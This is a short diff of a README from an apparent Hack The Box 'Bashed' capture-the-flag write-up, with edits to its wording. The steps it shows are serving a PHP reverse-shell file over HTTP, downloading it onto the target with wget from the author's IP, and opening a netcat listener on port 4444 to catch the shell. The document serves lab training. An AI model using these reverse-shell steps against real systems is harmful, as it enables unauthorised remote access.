Ewael/Boxes/HackTheBox/Bashed/README.md

 python -m SimpleHTTPServer 80
 ```

-From the *phpscript* page, I download it.
+From the *phpscript* page, I download it with

 ```bash
 wget 10.10.14.34/php-reverse-shell.php
 ```

-Here `10.10.14.34` is my IP.
-And to conclude I start netcat to listen on the port I configured in the reverse shell code.
+where `10.10.14.34` is my IP.
+To conclude I start netcat to listen on the port I configured in the reverse shell code.

 ```bash
 nc -lvnp 4444